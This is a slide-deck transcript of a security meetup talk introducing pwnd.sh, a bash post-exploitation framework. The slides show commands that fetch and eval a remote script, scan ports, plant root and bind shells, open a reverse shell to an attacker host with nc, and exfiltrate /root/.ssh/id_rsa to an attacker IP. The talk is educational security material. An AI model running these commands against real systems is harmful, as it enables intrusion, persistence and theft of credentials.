Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

pwnd.sh

241 views

Published on

pwnd.sh - A post exploitation tool written entirely in bash.
Presented in Null meet on 17/12/16

Published in: Technology
  • Be the first to comment

pwnd.sh

  1. 1. PWND.sh Post Exploitation Framework
  2. 2. Agenda SCENARIO: Have already compromised a Linux machine  What’s next after exploiting  Different functionalities of pwnd.sh  Q/A
  3. 3. ./about_me.py [+] Got name : Chandrapal [+] Website : chandrapal.me [+] Founder of : Hack with GitHub [+] Social Accounts : @bnchandrapal @HackwithGithub [-] Life : Traceback (most recent call last) : File “about_me.py”, line 150, in <module> TypeError: Can’t convert ‘infosec’ object to developer implicitly
  4. 4. Author Itzek Kotler (@itzikkotler) CTO & Co-founder @ SafeBreach http://ikotler.org
  5. 5. What plans in Post Exploitation Phase 3 possible things: ● Further penetrate into Network / Endpoints ● Get a firmer foothold on the Network / Endpoints ● Start Exfiltrating Data out of the Network / Endpoints
  6. 6. About the tool ● Newly released ● Easy as it is written in BASH ● Interactive and allows to create custom scripts ● License: 3-Clause BSD ● Both In-Memory and On-Disk deployment available ● Pipeline integrates pwnd.sh with other programs also
  7. 7. How can I get it ? > git clone https://github.com/SafeBreach-Labs/pwndsh.git > cd pwndsh
  8. 8. Why Bash and not Python / Perl / Ruby ? ● Same Bash for different Platforms (Mac, Linux, etc) and different architectures (x86, x64) ● It is the default shell on most systems ● There is socket programming in Bash (--enable-net-redirections) ● You cannot fallback to Bash from Python, Perl, etc but you can UPGRADE to Python, Perl, etc from Bash
  9. 9. Dependencies, or not to be Depended? ● No: – Consistent functionality across different Platforms, CPUs etc. – Smaller and simpler code base ● Yes: – Don't reinvent the wheel – Everything a Dependency in Shell Terms (ls, cat, etc) (Good coders create, Great coders reuse) PWND.SH – built with least amount of dependencies
  10. 10. Why In-memory? ● Constraints found: – Filesystem is readonly – “No space left on device” Solution: In-memory loading ● Works even if the Filesystem is mounted to be Read-only ● Multiple Versions can co-exists (in Multiple Shells) ● Disappears after Reboot
  11. 11. Let’s Start
  12. 12. Metasploitable 192.168.70.101 Ubuntu Find it It’s me 192.168.70.100 Scenario :
  13. 13. In-Memory Loading Method #1 X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreac h-Labs/pwndsh/master/bin/pwnd.sh"` eval "$X"
  14. 14. What if the system is on Intranet without Internet ? What if the system is in Internet Censored country where GitHub is blocked ?
  15. 15. In-Memory Loading Method #2 ● On source computer curl -fsSL "https://raw.githubusercontent.com/SafeBreach- Labs/pwndsh/master/bin/pwnd.sh" < Ctrl+Shift+C > ● On destination computer X=”<Ctrl+V>” eval “$X”
  16. 16. On-Disk Loading Method > curl -OfsSL "https://raw.githubusercontent.com/SafeBrea ch-Labs/pwndsh/master/bin/pwnd.sh" > source pwnd.sh
  17. 17. Scanning a Host (pwnd) $ portscanner 192.168.2.132 22/tcp
  18. 18. Scanning Networks (pwnd)$ for ip in $(seq 1 254); do portscanner 192.168.0.$ip 123/udp; done
  19. 19. Local Backdoor Example (pwnd)$ install_rootshell # Remember to invoke rootshell with ‘-p’
  20. 20. Remote Backdoor Example (pwnd)$ bindshell 1234 # Connect to host at 1234/tcp for rootshell
  21. 21. Remote Backdoor Example #2 # On 192.168.2.1 run: nc –l 1234 (pwnd)$ reverseshell 192.168.2.1 1234
  22. 22. Searching for Goodies (pwnd)$ hunt_privkeys
  23. 23. Exfil Example # On attacker machine run: nc –l <port> (pwnd)$ cat /root/.ssh/id_rsa | base64 | over_socket <attacker IP> <port>
  24. 24. Plugin Support ● You can create plugins and add you to the project ● All you need is: – GitHub account – Bash knowledge – Time
  25. 25. Q&A We have HACKED WITH GITHUB
  26. 26. References ● https://github.com/SafeBreach-Labs/pwndsh ● http://www.ikotler.org/JustGotPWND.pdf ● https://www.youtube.com/watch?v=kWU-fDv2wjM
  27. 27. Thank You

×